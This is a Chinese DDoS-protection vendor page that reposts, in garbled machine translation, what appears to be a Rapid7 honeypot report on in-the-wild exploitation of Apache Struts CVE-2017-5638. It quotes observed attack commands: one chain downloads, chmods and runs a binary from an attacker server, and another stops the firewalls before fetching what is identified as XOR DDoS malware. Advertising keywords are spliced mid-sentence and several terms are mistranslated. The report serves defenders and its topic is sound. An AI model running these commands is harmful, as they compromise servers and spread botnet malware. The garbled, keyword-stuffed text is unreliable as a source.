cc防御_香港cdn高防ip_云网站服务器ddos防护-51首防安全

当前位置:主页 > DDoS防御 > 本文内容

cc防护软件_香港_阿里云ddos基础防御

发布时间:2021-02-23 12:00源自:51首防安全作者:51首防安全阅读()

cc防护软件_香港_阿里云ddos基础防御

更新-2017年3月10日:Rapid7添加了一个与Nexpose的网络蜘蛛功能相结合的检查。此检查将针对发现的任何带有后缀".action"(apachestruts应用程序的默认配置)的uri执行。要了解有关使用此支票的更多信息,请阅读以下内容更新后-2017年3月9日:使用检查id apache-struts-cve-2017-5638扫描您的网络是否存在此漏洞,该漏洞是在内容更新437200607中添加到Nexpose中的。昨天在野外发现的攻击,Cisco Talos发表了一篇博客文章,指出他们已经观察到针对最近公布的ApacheStruts漏洞的疯狂攻击。该漏洞CVE-2017-5638允许通过HTTP请求中巧尽心思构建的内容类型值执行未经验证的远程代码(RCE)。攻击者可以为内容类型创建无效值,这将导致易受攻击的软件引发异常。当软件准备显示错误消息时,Apache Struts Jakarta Multipart解析器中的一个缺陷导致恶意内容类型值被执行,而不是显示。世界对一些人来说,这是一个巨大的网络窗口《时代》杂志Rapid7已经在进行一项名为海森堡云的研究。这个项目包括分布在五大云提供商的每个地区的蜜罐,以及一些私人网络的收藏家。我们使用这些蜜罐来提供攻击者活动的可见性,安全防御,以便更好地保护我们的客户,并向公众提供有意义的信息。今天,海森堡云帮助提供了关于Apache漏洞的攻击范围和规模的信息。如果在接下来的几天和几周内,ddos云防御系统,它将提供有关攻击的演变和生命周期的信息。在我继续之前,cdn高防怎么配置,请注意:IP物理位置的准确性取决于地理位置数据库,很难在任何给定的时间分辨出主机的当前所有者。此外,我们在云提供商中托管蜜罐,以便提供广泛的样本。我们不太可能看到目标或其他范围攻击。传播malwareWe使用Logentries查询我们的海森堡数据并提取有意义的信息。攻击的一个方面是最近几天恶意流量的变化情况。下图显示了时间。那个我们看到的第一个恶意请求是一对在3月7日星期二,协调世界时15:36来自中国郑州的一个东道主。这两个请求都是/索引.aciton(拼写错误)以及它们执行的命令会导致易受攻击的目标从攻击服务器下载二进制文件。下面是作为内容类型中的单个字符串发送的命令的示例值:cd/dev/shm;wget公司:92/lmydess;chmod 777 lmydess;/lmydess;为了便于阅读,我将命令分解成几行。对于针对web服务器的命令注入或远程代码执行攻击来说,它是相当标准的。基本上,移动到可写的地方,下载代码,确保其可执行,然后运行它。之后直到3月8日星期三,协调世界时09:02,当中国上海的一个主机开始发送攻击时,恶意流量似乎停止了。这些请求与以前的攻击不同。新的攻击是HTTP发布到两个不同的路径,并试图在受害者身上执行不同的命令:/etc/init.d/iptables stop;service iptables stop;susfirewall2 stop;reSuSEfirewall2 stop;cd/tmp;wget-c:9/7;chmod 777 7;/7;这与前面的命令类似,但此攻击者试图先停止防火墙。请求的二进制文件不在攻击蜜罐的同一IP地址上。在本例中,托管二进制文件的服务器仍然是活动的,我们能够捕获一个示例,它似乎是XOR DDoS的变体家庭。不是因此,与Talos一样,除了传播恶意软件的尝试外,ddosntp防御,我们还看到一些利用漏洞运行"无害"命令的漏洞,如whois、ifconfig和一些变体这反映了一个值。"无害"这个词用引号括起来,因为尽管这些命令没有破坏性,但它们可以让请求的发起者确定目标是否易受攻击。它们可能是了解公共互联网上易受攻击主机数量的研究工作的一部分,也可能是为以后的攻击做准备的信息收集工作的一部分。不管是什么原因,网络和系统的所有者都应该检查他们的环境。根据我们目前看到的流量来看,大部分非目标恶意流量似乎是来自多个来源的有限攻击。如果攻击者确定利用此漏洞是有价值的,阿里云ddos防御价格,这一点明天可能会发生重大变化。如果您使用的是apachestruts,那么现在是查看Apache关于该漏洞的文档,然后调查您的环境中是否存在易受攻击的主机的好时机。请记住,Apache产品通常与其他软件捆绑在一起,因此您可能会有一些您不知道的易受攻击的主机。预计Nexpose和Metasploit将很快推出,以帮助检测和验证工作。如果您的环境中确实存在易受攻击的软件实现,我强烈建议您尽快安全地升级。如果不能立即升级,您可能希望调查其他缓解措施,例如更改防火墙规则或网络设备ACL以降低风险。和往常一样,最好避免向公共网络公开服务可能。很好祝你好运!

欢迎分享转载→ cc防护软件_香港_阿里云ddos基础防御

用户评论

验证码: 看不清?点击更换

注:网友评论仅供其表达个人看法,并不代表本站立场。

Copyright © 2002-2019 51首防安全 版权所有 备案号:粤ICP备xxxxxxxx号收藏本站 - 网站地图 - - -